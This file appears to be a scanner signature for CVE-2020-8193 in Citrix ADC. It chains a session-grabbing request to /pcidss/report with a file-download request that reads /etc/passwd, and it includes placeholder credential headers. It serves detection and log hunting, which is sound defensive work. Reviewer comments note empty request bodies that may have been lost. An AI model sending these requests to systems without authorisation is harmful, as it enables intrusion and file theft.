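# Two-step detection signature for CVE-2020-8193 (Citrix ADC).
# Request 1 must answer HTTP 406 and set a SESSID cookie; request 2 reuses
# that cookie and is flagged when the response looks like passwd content.
# Affected builds and remediation: vendor advisory CTX276688 (see reference).
# Log hunting: the same two paths, /pcidss/report with
# sid=loginchallengeresponse... and /rapi/filedownload?filter=path:, are what
# to look for in appliance HTTP logs.
id: CVE-2020-8193
single: true
info:
  name: Citrix ADC LFI - CVE-2020-8193
  risk: High

params:
  - root: "{{.BaseURL}}"
  # NOTE(review): user/pass look like arbitrary placeholder strings rather
  # than real credentials; confirm against the referenced write-up.
  - user: "e4LZnjB9"
  - pass: "kRcEnFy6"
  # URL-encoded /etc/passwd
  - file: "%2Fetc%2Fpasswd"

requests:
  # get session
  - method: POST
    redirect: false
    url: >-
      {{.root}}//pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Accept: application/xml
      - Accept-Language: en-US,en;q=0.5
      - Content-Type: application/xml
      - X-NITRO-USER: "{{.user}}"
      - X-NITRO-PASS: "{{.pass}}"
    # NOTE(review): the body is empty on this page although Content-Type is
    # application/xml; markup may have been lost when the page was extracted.
    # Confirm against the upstream signature before relying on this check.
    body: |
    detections:
      - >-
        StatusCode() == 406 && StringSearch("resHeaders", "SESSID=")
    conclusions:
      # The capture group must be named `sess`: request 2 reads it through
      # ValueOf("sess") and [[.sess]]. The page showed `(?P(`, which has no
      # group name and is not a valid named-group pattern.
      - RegexSelect("resHeaders", "SESSID=(?P<sess>([a-zA-Z0-9]+));")

  # pass session from request 1
  - conditions:
      # Skip this request when request 1 produced no session id.
      - ValueOf("sess") !== ""
    method: POST
    redirect: false
    url: >-
      {{.root}}//rapi/filedownload?filter=path:{{.file}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      # NOTE(review): Accept appears twice in this list (application/xml here,
      # "*/*" below); which value is sent depends on how the consumer merges
      # header entries. Confirm that is intended.
      - Accept: application/xml
      - Accept-Language: en-US,en;q=0.5
      - Content-Type: application/xml
      # Quoted so a YAML loader cannot read it as a float and drop digits.
      - rand_key: "1968033329.1594279178769461"
      - Accept: "*/*"
      - X-NITRO-USER: "{{.user}}"
      - X-NITRO-PASS: "{{.pass}}"
      - Cookie: SESSID=[[.sess]]; is_cisco_platform=0; startupapp=neo
    # NOTE(review): empty body here as well; see the note on request 1.
    body: |
    detections:
      # Plain substring match on the response body: both "root:" and
      # "bin/bash" must be present. A page that merely echoes these strings
      # would also match, so verify hits manually.
      - >-
        StringSearch("body", "root:") && StringSearch("body", "bin/bash")

reference:
  - links:
      - https://dmaasland.github.io/posts/citrix.html
      - https://support.citrix.com/article/CTX276688
      - https://www.cvebase.com/cve/2020/8193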